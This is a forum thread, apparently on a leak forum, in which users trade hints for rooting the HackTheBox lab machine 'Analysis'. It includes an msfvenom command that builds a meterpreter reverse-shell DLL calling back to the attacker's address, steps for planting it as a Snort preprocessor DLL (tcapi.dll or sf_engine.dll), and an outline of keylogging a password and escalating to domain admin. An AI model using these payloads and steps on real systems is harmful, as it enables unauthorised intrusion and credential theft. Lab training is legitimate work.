01-21-2024, 07:39 PM
hey what the step did you take
Ban reason: Compromised - Malware Logs (Permanent)
|
Analysis - HTB
by paven - Saturday January 20, 2024 at 01:22 PM
|
|
01-21-2024, 07:39 PM
hey what the step did you take
Ban reason: Compromised - Malware Logs (Permanent)
01-21-2024, 07:55 PM
01-21-2024, 08:20 PM
on matters root, are we supposed to trigger the dll somehow, or is automaticaly triggered, i can't see any changes in metasploit exploit
(01-21-2024, 08:20 PM)xlr Wrote: on matters root, are we supposed to trigger the dll somehow, or is automaticaly triggered, i can't see any changes in metasploit exploit Every 2 minutes or so, that's how and why the logs are generated as well - being automated. And if you name the dll properly, and place it into to the right folder, it should be executed. ![]() Just be patient but if nothing happens for minutes then you did something wrong or your dll is wrong..
01-21-2024, 09:04 PM
(This post was last modified: 01-21-2024, 09:06 PM by tiresomeenergy.)
(01-21-2024, 08:58 PM)peRd1 Wrote: And if you name the dll properly, and place it into to the right folder, it should be executed. can u confirm, dll should be named tcapi.dll and placed in snort_dynamicpreprocessor? edit with more info: i get error when trying to run manually: ERROR: Failed to load C:\snort\lib\snort_dynamicpreprocessor\tcapi.dll: 193Fatal Error, Quitting..Could not set the event message file. been waiting for it to trigger on normal cadence and still nothing
I must be missing something. I used msfvenom to generate the dll after trying to do it by hand and it never seemingly being called.
where X is my local ip and port. msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 -f dll LHOST=10.10.14.X LPORT=X > tcapi.dll upload tcapi.dll to C:\Snort\lib\snort_dynamicpreprocessor\ with evil-winrm upload command msfconsole multi/handler lhost lport same ip and port. run nothing ever happens. I also tried writing my own dll that just touches a file in c:\temp and that also never triggers
01-21-2024, 10:06 PM
(01-21-2024, 09:41 PM)Alturis Wrote: I must be missing something. I used msfvenom to generate the dll after trying to do it by hand and it never seemingly being called. Yeah I'm doing the exact same thing and its not working for me too. I think they must have patched it. This probably was unintended root.
Ban reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect. (Permanent)
(01-21-2024, 09:41 PM)Alturis Wrote: I must be missing something.Name it sf_engine.dll ![]() You can read about this more from the snort.conf - dynamic preprocessor libraries are loaded first then core dynamic engine processor. Duh, "pre processor". Surely, it's not patched first week until release arena is up (seasonal competition). (01-21-2024, 10:15 PM)yonigga Wrote:(01-21-2024, 10:06 PM)ByteBuster Wrote:(01-21-2024, 09:30 PM)yonigga Wrote: Intended root is through encoded file and BCTextEncoder as told by CREATOR. keylogger and grab the bctextencoder's pass, then decode the private text and probably results in poor will smith's credentials. from there it's traditional AD privesc, as per bloodhound graph, wsmith > soc_analyst > admin. |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 360 | 88,710 |
03-28-2026, 09:28 AM Last Post: |
||
| [FREE] HTB-ProLabs APTLABS Just Flags | 23 | 2,348 |
03-28-2026, 03:30 AM Last Post: |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 87 | 7,490 |
03-27-2026, 07:22 PM Last Post: |
||
| HTB Eloquia User and Root Flags - Insane Box | 13 | 350 |
03-27-2026, 06:14 PM Last Post: |
||
| HTB - ALL Challenges you Stuck in | 2 | 646 |
03-27-2026, 04:24 PM Last Post: |
||